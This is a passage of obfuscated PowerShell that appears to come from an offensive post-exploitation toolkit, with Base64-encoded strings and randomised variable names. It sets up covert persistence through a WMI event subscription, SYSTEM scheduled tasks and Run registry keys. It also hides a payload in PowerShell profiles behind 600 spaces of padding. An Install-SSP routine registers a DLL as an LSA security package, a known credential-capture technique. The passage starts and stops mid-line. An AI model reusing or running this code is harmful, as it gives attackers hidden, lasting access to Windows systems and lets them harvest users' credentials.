@{name='Updater';EventNameSpace='root\CimV2';QueryLanguage=```"WQL```";Query=```"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = $(${cc4057f43ec0452aa83a64356d7ea926}.Time.ToString('HH')) AND TargetInstance.Minute = $(${cc4057f43ec0452aa83a64356d7ea926}.Time.ToString('mm')) GROUP WITHIN 60```"};```$Consumer=Set-WmiInstance -Namespace ```"root\subscription```" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=```"```$(```$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive```";RunInteractively='false'};Set-WmiInstance -Namespace ```"root\subscription```" -Class __FilterToConsumerBinding -Arguments @{Filter=```$Filter;Consumer=```$Consumer} | Out-Null`"" 328 | } 329 | default 330 | { 331 | throw 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAGUAbABlAHYAYQB0AGUAZAAgAHAAZQByAHMAaQBzAHQAZQBuAGMAZQAgAG8AcAB0AGkAbwBuAHMAIABwAHIAbwB2AGkAZABlAGQAIQA='))) 332 | } 333 | } 334 | } 335 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawA='))) 336 | { 337 | ${516bba0d0e5b4ca4ab825c6a9c4ef241} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YAAiACQAKAAkAEUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAApAFwAUwB5AHMAdABlAG0AMwAyAFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlAGAAIgA='))) 338 | ${f17dc4af4f9142bfa43c36189ff132e3} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBjAGgAdABhAHMAawBzACAALwBEAGUAbABlAHQAZQAgAC8AVABOACAAVQBwAGQAYQB0AGUAcgA='))) 339 | switch (${cc4057f43ec0452aa83a64356d7ea926}.Trigger) 340 | { 341 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB0AEwAbwBnAG8AbgA='))) 342 | { 343 | ${d8effee50a3b401592d3653210566b62} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBjAGgAdABhAHMAawBzACAALwBDAHIAZQBhAHQAZQAgAC8AUgBVACAAcwB5AHMAdABlAG0AIAAvAFMAQwAgAE8ATgBMAE8ARwBPAE4AIAAvAFQATgAgAFUAcABkAGEAdABlAHIAIAAvAFQAUgAgAA=='))) 344 | } 345 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABhAGkAbAB5AA=='))) 346 | { 347 | ${d8effee50a3b401592d3653210566b62} = "schtasks /Create /RU system /SC DAILY /ST $(${cc4057f43ec0452aa83a64356d7ea926}.Time.ToString($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABIADoAbQBtADoAcwBzAA=='))))) /TN Updater /TR " 348 | } 349 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwBuAEkAZABsAGUA'))) 350 | { 351 | ${d8effee50a3b401592d3653210566b62} = 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBjAGgAdABhAHMAawBzACAALwBDAHIAZQBhAHQAZQAgAC8AUgBVACAAcwB5AHMAdABlAG0AIAAvAFMAQwAgAE8ATgBJAEQATABFACAALwBJACAAMQAgAC8AVABOACAAVQBwAGQAYQB0AGUAcgAgAC8AVABSACAA'))) 352 | } 353 | default 354 | { 355 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAGUAbABlAHYAYQB0AGUAZAAgAHAAZQByAHMAaQBzAHQAZQBuAGMAZQAgAG8AcAB0AGkAbwBuAHMAIABwAHIAbwB2AGkAZABlAGQAIQA='))) 356 | } 357 | } 358 | ${d8effee50a3b401592d3653210566b62} = '"' + ${d8effee50a3b401592d3653210566b62} + ${516bba0d0e5b4ca4ab825c6a9c4ef241} + '"' 359 | } 360 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGcAaQBzAHQAcgB5AA=='))) 361 | { 362 | ${d8effee50a3b401592d3653210566b62} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgAEgASwBMAE0AOgBTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgBcACAALQBOAGEAbQBlACAAVQBwAGQAYQB0AGUAcgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAA'))) 363 | ${f17dc4af4f9142bfa43c36189ff132e3} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAG0AbwB2AGUALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgAEgASwBMAE0AOgBTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgBcACAALQBOAGEAbQBlACAAVQBwAGQAYQB0AGUAcgA='))) 364 | ${516bba0d0e5b4ca4ab825c6a9c4ef241} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('IgBgACIAJAAoACQARQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACkAXABTAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlAGAAIgAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiAA=='))) 365 | ${d8effee50a3b401592d3653210566b62} = "'" + 
${d8effee50a3b401592d3653210566b62} + ${516bba0d0e5b4ca4ab825c6a9c4ef241} + "'" 366 | } 367 | default 368 | { 369 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAGUAbABlAHYAYQB0AGUAZAAgAHAAZQByAHMAaQBzAHQAZQBuAGMAZQAgAG8AcAB0AGkAbwBuAHMAIABwAHIAbwB2AGkAZABlAGQAIQA='))) 370 | } 371 | } 372 | switch (${df8063b79a7a452ca1a2f7709c4fa2c5}.Method) 373 | { 374 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawA='))) 375 | { 376 | ${516bba0d0e5b4ca4ab825c6a9c4ef241} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YAAiACQAKAAkAEUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAApAFwAUwB5AHMAdABlAG0AMwAyAFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlAGAAIgA='))) 377 | ${50dd3889beaf444088a6e13beb8c3d8e} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBjAGgAdABhAHMAawBzACAALwBEAGUAbABlAHQAZQAgAC8AVABOACAAVQBwAGQAYQB0AGUAcgA='))) 378 | switch (${df8063b79a7a452ca1a2f7709c4fa2c5}.Trigger) 379 | { 380 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABhAGkAbAB5AA=='))) 381 | { 382 | ${5551831a2227477db4a61598ddf7fbc8} = "schtasks /Create /SC DAILY /ST $(${df8063b79a7a452ca1a2f7709c4fa2c5}.Time.ToString($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABIADoAbQBtADoAcwBzAA=='))))) /TN Updater /TR " 383 | } 384 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwBuAEkAZABsAGUA'))) 385 | { 386 | ${5551831a2227477db4a61598ddf7fbc8} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBjAGgAdABhAHMAawBzACAALwBDAHIAZQBhAHQAZQAgAC8AUwBDACAATwBOAEkARABMAEUAIAAvAEkAIAAxACAALwBUAE4AIABVAHAAZABhAHQAZQByACAALwBUAFIAIAA='))) 387 | } 388 | default 389 | { 390 | throw 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAHUAcwBlAHIALQBsAGUAdgBlAGwAIABwAGUAcgBzAGkAcwB0AGUAbgBjAGUAIABvAHAAdABpAG8AbgBzACAAcAByAG8AdgBpAGQAZQBkACEA'))) 391 | } 392 | } 393 | ${5551831a2227477db4a61598ddf7fbc8} = '"' + ${5551831a2227477db4a61598ddf7fbc8} + ${516bba0d0e5b4ca4ab825c6a9c4ef241} + '"' 394 | } 395 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGcAaQBzAHQAcgB5AA=='))) 396 | { 397 | ${5551831a2227477db4a61598ddf7fbc8} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgAEgASwBDAFUAOgBTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgBcACAALQBOAGEAbQBlACAAVQBwAGQAYQB0AGUAcgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAA'))) 398 | ${50dd3889beaf444088a6e13beb8c3d8e} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAG0AbwB2AGUALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgAEgASwBDAFUAOgBTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgBcACAALQBOAGEAbQBlACAAVQBwAGQAYQB0AGUAcgA='))) 399 | ${516bba0d0e5b4ca4ab825c6a9c4ef241} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('IgBgACIAJAAoACQARQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACkAXABTAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlAGAAIgAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiAA=='))) 400 | ${5551831a2227477db4a61598ddf7fbc8} = "'" + ${5551831a2227477db4a61598ddf7fbc8} + ${516bba0d0e5b4ca4ab825c6a9c4ef241} + "'" 401 | } 402 | default 403 | { 404 | throw 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAHUAcwBlAHIALQBsAGUAdgBlAGwAIABwAGUAcgBzAGkAcwB0AGUAbgBjAGUAIABvAHAAdABpAG8AbgBzACAAcAByAG8AdgBpAGQAZQBkACEA'))) 405 | } 406 | } 407 | ${b659b2714f7e4472b30891ae30f5e1b4} = { 408 | function FUNCTIONNAME{ 409 | Param([Switch]${ac6e7283283e453eaedd99a83d16eb5a}) 410 | $ErrorActionPreference=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQA='))) 411 | ${675e1081ca814260a8f2a0866f0d3c90}={ORIGINALSCRIPT} 412 | if(${ac6e7283283e453eaedd99a83d16eb5a}){ 413 | if(([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgA='))))) 414 | {${81bbd3a50f4d4a3abee6f69f71babbf9}=$PROFILE.AllUsersAllHosts;${2eaa38342e0e4b648d2675d6dba3a304}=ELEVATEDTRIGGER} 415 | else 416 | {${81bbd3a50f4d4a3abee6f69f71babbf9}=$PROFILE.CurrentUserAllHosts;${2eaa38342e0e4b648d2675d6dba3a304}=USERTRIGGER} 417 | md (Split-Path -Parent ${81bbd3a50f4d4a3abee6f69f71babbf9}) 418 | (gc ${81bbd3a50f4d4a3abee6f69f71babbf9}) + (' ' * 600 + ${675e1081ca814260a8f2a0866f0d3c90})|Out-File ${81bbd3a50f4d4a3abee6f69f71babbf9} -Fo 419 | iex ${2eaa38342e0e4b648d2675d6dba3a304}|Out-Null 420 | echo ${2eaa38342e0e4b648d2675d6dba3a304}} 421 | else 422 | {${675e1081ca814260a8f2a0866f0d3c90}.Invoke()} 423 | } EXECUTEFUNCTION 424 | } 425 | ${b659b2714f7e4472b30891ae30f5e1b4} = ${b659b2714f7e4472b30891ae30f5e1b4}.ToString().Replace($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBVAE4AQwBUAEkATwBOAE4AQQBNAEUA'))), ${e1647abadf884b208ff363b3ef33e4b0}) 426 | ${b659b2714f7e4472b30891ae30f5e1b4} = ${b659b2714f7e4472b30891ae30f5e1b4}.ToString().Replace($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwBSAEkARwBJAE4AQQBMAFMAQwBSAEkAUABUAA=='))), 
${bdde8df95b13416abc69e7f89b90b98e}) 427 | ${b659b2714f7e4472b30891ae30f5e1b4} = ${b659b2714f7e4472b30891ae30f5e1b4}.ToString().Replace($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBMAEUAVgBBAFQARQBEAFQAUgBJAEcARwBFAFIA'))), ${d8effee50a3b401592d3653210566b62}) 428 | ${b659b2714f7e4472b30891ae30f5e1b4} = ${b659b2714f7e4472b30891ae30f5e1b4}.ToString().Replace($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBTAEUAUgBUAFIASQBHAEcARQBSAA=='))), ${5551831a2227477db4a61598ddf7fbc8}) 429 | if (${cf9bd0c2aaee4219940dc2dd6ab44219}) 430 | { 431 | ${b659b2714f7e4472b30891ae30f5e1b4} = ${b659b2714f7e4472b30891ae30f5e1b4}.ToString().Replace($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBYAEUAQwBVAFQARQBGAFUATgBDAFQASQBPAE4A'))), '') 432 | } 433 | else 434 | { 435 | ${b659b2714f7e4472b30891ae30f5e1b4} = ${b659b2714f7e4472b30891ae30f5e1b4}.ToString().Replace($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBYAEUAQwBVAFQARQBGAFUATgBDAFQASQBPAE4A'))), "${e1647abadf884b208ff363b3ef33e4b0} -Persist") 436 | } 437 | ${95f2db71f337426492d85e9665344ad3} = @" 438 | # Execute the following to remove the elevated persistent payload 439 | ${f17dc4af4f9142bfa43c36189ff132e3} 440 | # Execute the following to remove the user-level persistent payload 441 | ${50dd3889beaf444088a6e13beb8c3d8e} 442 | "@ 443 | ${b659b2714f7e4472b30891ae30f5e1b4} | Out-File ${966f141aaef74dcaab3ffcd81c15f7b8} 444 | Write-Verbose "Persistence script written to ${966f141aaef74dcaab3ffcd81c15f7b8}" 445 | ${95f2db71f337426492d85e9665344ad3} | Out-File ${188aaa68b84a471c8bc115bfaea60abf} 446 | Write-Verbose "Persistence removal script written to ${188aaa68b84a471c8bc115bfaea60abf}" 447 | if (${a9f05a6260d64d84befdddce7da6437b}) 448 | { 449 | echo ([ScriptBlock]::Create(${b659b2714f7e4472b30891ae30f5e1b4})) 450 | } 451 | } 452 | function Install-SSP 453 | { 454 | [CmdletBinding()] Param ( 455 | [ValidateScript({Test-Path (rvpa $_)})] 456 | 
[String] 457 | ${c64edf13e2624028966218a15073390b} 458 | ) 459 | ${fd8b9b45f19c4400a8fb9de41f05526c} = [Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent() 460 | if(-not ${fd8b9b45f19c4400a8fb9de41f05526c}.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) 461 | { 462 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHMAdABhAGwAbABpAG4AZwAgAGEAbgAgAFMAUwBQACAAZABsAGwAIAByAGUAcQB1AGkAcgBlAHMAIABhAGQAbQBpAG4AaQBzAHQAcgBhAHQAaQB2AGUAIAByAGkAZwBoAHQAcwAuACAARQB4AGUAYwB1AHQAZQAgAHQAaABpAHMAIABzAGMAcgBpAHAAdAAgAGYAcgBvAG0AIABhAG4AIABlAGwAZQB2AGEAdABlAGQAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAcAByAG8AbQBwAHQALgA='))) 463 | } 464 | ${c8a8ed288c9549119b34c598f0cedab7} = rvpa ${c64edf13e2624028966218a15073390b} 465 | function local:Get-PEArchitecture 466 | { 467 | Param 468 | ( 469 | [Parameter( Position = 0, 470 | Mandatory = $True )] 471 | [String] 472 | ${c64edf13e2624028966218a15073390b} 473 | ) 474 | ${e031c7ef3ee1487c89e804262dd8bb1c} = New-Object System.IO.FileStream(${c64edf13e2624028966218a15073390b}, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read) 475 | [Byte[]] $MZHeader = New-Object Byte[](2) 476 | ${e031c7ef3ee1487c89e804262dd8bb1c}.Read($MZHeader,0,2) | Out-Null 477 | ${9a1deaf82de949cb85c843016bdc8031} = [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader) 478 | if (${9a1deaf82de949cb85c843016bdc8031} -ne 'MZ') 479 | { 480 | ${e031c7ef3ee1487c89e804262dd8bb1c}.Close() 481 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAFAARQAgAGgAZQBhAGQAZQByAC4A'))) 482 | } 483 | ${e031c7ef3ee1487c89e804262dd8bb1c}.Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null 484 | [Byte[]] $lfanew = New-Object Byte[](4) 485 | ${e031c7ef3ee1487c89e804262dd8bb1c}.Read($lfanew,0,4) | Out-Null 486 | ${fe0f917046bf4d9d8a06ef630810cce7} = [Int] ($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAB4AHsAMAB9AA=='))) -f (( $lfanew[-1..-4] | % { 
$_.ToString('X2') } ) -join '')) 487 | ${e031c7ef3ee1487c89e804262dd8bb1c}.Seek(${fe0f917046bf4d9d8a06ef630810cce7} + 4, [System.IO.SeekOrigin]::Begin) | Out-Null 488 | [Byte[]] $IMAGE_FILE_MACHINE = New-Object Byte[](2) 489 | ${e031c7ef3ee1487c89e804262dd8bb1c}.Read($IMAGE_FILE_MACHINE,0,2) | Out-Null 490 | ${d3ada9716a024ec4bbd18db5b49df90b} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ewAwAH0A'))) -f (( $IMAGE_FILE_MACHINE[-1..-2] | % { $_.ToString('X2') } ) -join '') 491 | ${e031c7ef3ee1487c89e804262dd8bb1c}.Close() 492 | if ((${d3ada9716a024ec4bbd18db5b49df90b} -ne $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAxADQAQwA=')))) -and (${d3ada9716a024ec4bbd18db5b49df90b} -ne $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('OAA2ADYANAA='))))) 493 | { 494 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAFAARQAgAGgAZQBhAGQAZQByACAAbwByACAAdQBuAHMAdQBwAHAAbwByAHQAZQBkACAAYQByAGMAaABpAHQAZQBjAHQAdQByAGUALgA='))) 495 | } 496 | if (${d3ada9716a024ec4bbd18db5b49df90b} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAxADQAQwA=')))) 497 | { 498 | echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MwAyAC0AYgBpAHQA'))) 499 | } 500 | elseif (${d3ada9716a024ec4bbd18db5b49df90b} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('OAA2ADYANAA=')))) 501 | { 502 | echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('NgA0AC0AYgBpAHQA'))) 503 | } 504 | else 505 | { 506 | echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwB0AGgAZQByAA=='))) 507 | } 508 | } 509 | ${5fd231bc1f04486897e6d6d3dac6a263} = Get-PEArchitecture ${c8a8ed288c9549119b34c598f0cedab7} 510 | ${7b947702b5f14f0795519fe23e777f55} = gwmi Win32_OperatingSystem | select -ExpandProperty OSArchitecture 511 | if (${5fd231bc1f04486897e6d6d3dac6a263} -ne ${7b947702b5f14f0795519fe23e777f55}) 512 | { 513 | throw 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABoAGUAIABvAHAAZQByAGEAdABpAG4AZwAgAHMAeQBzAHQAZQBtACAAYQByAGMAaABpAHQAZQBjAHQAdQByAGUAIABtAHUAcwB0ACAAbQBhAHQAYwBoACAAdABoAGUAIABhAHIAYwBoAGkAdABlAGMAdAB1AHIAZQAgAG8AZgAgAHQAaABlACAAUwBTAFAAIABkAGwAbAAuAA=='))) 514 | } 515 | ${7224f83d7191419f8213c7d4de3ebbf9} = gi ${c8a8ed288c9549119b34c598f0cedab7} | select -ExpandProperty Name 516 | ${068421be1fce4376800328fbc5a28b89} = ${7224f83d7191419f8213c7d4de3ebbf9} | % { % {($_ -split '\.')[0]} } 517 | ${607878ccac164886b2b4e23fcca9041a} = gp HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAGMAdQByAGkAdAB5ACAAUABhAGMAawBhAGcAZQBzAA=='))) | 518 | select -ExpandProperty $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAGMAdQByAGkAdAB5ACAAUABhAGMAawBhAGcAZQBzAA=='))) 519 | if (${607878ccac164886b2b4e23fcca9041a} -contains ${068421be1fce4376800328fbc5a28b89}) 520 | { 521 | throw "'${068421be1fce4376800328fbc5a28b89}' is already present in HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages." 522 | } 523 | ${106879f3248c4eba9f57aa44fbcd5ccc} = "$($Env:windir)\Sysnative" 524 | if (Test-Path ${106879f3248c4eba9f57aa44fbcd5ccc}) 525 | { 526 | ${0449ce4ae41c4c05b87128b87d60478f} = ${106879f3248c4eba9f57aa44fbcd5ccc} 527 | } 528 | else 529 | { 530 | ${0449ce4ae41c4c05b87128b87d60478f} = "$($Env:windir)\System32" 531 | } 532 | if (Test-Path (Join-Path ${0449ce4ae41c4c05b87128b87d60478f} ${7224f83d7191419f8213c7d4de3ebbf9})) 533 | { 534 | throw "${7224f83d7191419f8213c7d4de3ebbf9} is already installed in ${0449ce4ae41c4c05b87128b87d60478f}." 
535 | } 536 | cp ${c8a8ed288c9549119b34c598f0cedab7} ${0449ce4ae41c4c05b87128b87d60478f} 537 | ${607878ccac164886b2b4e23fcca9041a} += ${068421be1fce4376800328fbc5a28b89} 538 | sp HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAGMAdQByAGkAdAB5ACAAUABhAGMAawBhAGcAZQBzAA=='))) -Value ${607878ccac164886b2b4e23fcca9041a} 539 | ${1f8ecc981fbb4e47ba061a53044a707d} = New-Object System.Reflection.AssemblyName($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBTAFAASQAyAA==')))) 540 | ${fe4d7ca4026e47f3b620ed1e74c0e37a} = [AppDomain]::CurrentDomain.DefineDynamicAssembly(${1f8ecc981fbb4e47ba061a53044a707d}, [Reflection.Emit.AssemblyBuilderAccess]::Run) 541 | ${ac678682e4f149bfafb1b16e8d88c398} = ${fe4d7ca4026e47f3b620ed1e74c0e37a}.DefineDynamicModule($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBTAFAASQAyAA=='))), $False) 542 | ${45b97198ae354124831731ef24c92007} = ${ac678682e4f149bfafb1b16e8d88c398}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBTAFAASQAyAC4AUwBlAGMAdQByADMAMgA='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAEMAbABhAHMAcwA=')))) 543 | ${3a0d90aa783842659ba2918c88428ef3} = ${45b97198ae354124831731ef24c92007}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAGQAUwBlAGMAdQByAGkAdAB5AFAAYQBjAGsAYQBnAGUA'))), 544 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBlAGMAdQByADMAMgAuAGQAbABsAA=='))), 545 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA=='))), 546 | [Reflection.CallingConventions]::Standard, 547 | [Int32], 548 | [Type[]] @([String], [IntPtr]), 549 | [Runtime.InteropServices.CallingConvention]::Winapi, 550 | [Runtime.InteropServices.CharSet]::Auto) 551 | ${036a3cc75ce04b6e8c8f0f3f43bb1521} = ${45b97198ae354124831731ef24c92007}.CreateType() 552 | 
if ([IntPtr]::Size -eq 4) { 553 | ${1c87c8c7352b45ff98e9ead84daaa574} = 20 554 | } else { 555 | ${1c87c8c7352b45ff98e9ead84daaa574} = 24 556 | } 557 | ${8e8f00cc1f994a95a799c9c24396a2e4} = [Runtime.InteropServices.Marshal]::AllocHGlobal(${1c87c8c7352b45ff98e9ead84daaa574}) 558 | [Runtime.InteropServices.Marshal]::WriteInt32(${8e8f00cc1f994a95a799c9c24396a2e4}, ${1c87c8c7352b45ff98e9ead84daaa574}) 559 | ${fc9779339f7f411196a703cc7b137b81} = $True 560 | try { 561 | ${8d8d49797b5b494095bad3098d94ec73} = ${036a3cc75ce04b6e8c8f0f3f43bb1521}::AddSecurityPackage(${068421be1fce4376800328fbc5a28b89}, ${8e8f00cc1f994a95a799c9c24396a2e4}) 562 | } catch { 563 | ${4e989fb8ffc14376960d82cc58c5fd3b} = $Error[0].Exception.InnerException.HResult 564 | Write-Warning "Runtime loading of the SSP failed. (0x$(${4e989fb8ffc14376960d82cc58c5fd3b}.ToString('X8')))" 565 | Write-Warning "Reason: $(([ComponentModel.Win32Exception] ${4e989fb8ffc14376960d82cc58c5fd3b}).Message)" 566 | ${fc9779339f7f411196a703cc7b137b81} = $False 567 | } 568 | if (${fc9779339f7f411196a703cc7b137b81}) { 569 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHMAdABhAGwAbABhAHQAaQBvAG4AIABhAG4AZAAgAGwAbwBhAGQAaQBuAGcAIABjAG8AbQBwAGwAZQB0AGUAIQA='))) 570 | } else { 571 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHMAdABhAGwAbABhAHQAaQBvAG4AIABjAG8AbQBwAGwAZQB0AGUAIQAgAFIAZQBiAG8AbwB0ACAAZgBvAHIAIABjAGgAYQBuAGcAZQBzACAAdABvACAAdABhAGsAZQAgAGUAZgBmAGUAYwB0AC4A'))) 572 | } 573 | } 574 | function Get-SecurityPackages 575 | { 576 | [CmdletBinding()] Param() 577 | ${1f8ecc981fbb4e47ba061a53044a707d} = New-Object System.Reflection.AssemblyName($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBTAFAASQA=')))) 578 | ${fe4d7ca4026e47f3b620ed1e74c0e37a} = [AppDomain]::CurrentDomain.DefineDynamicAssembly(${1f8ecc981fbb4e47ba061a53044a707d}, [Reflection.Emit.AssemblyBuilderAccess]::Run) 579 | ${ac678682e4f149bfafb1b16e8d88c398} = 
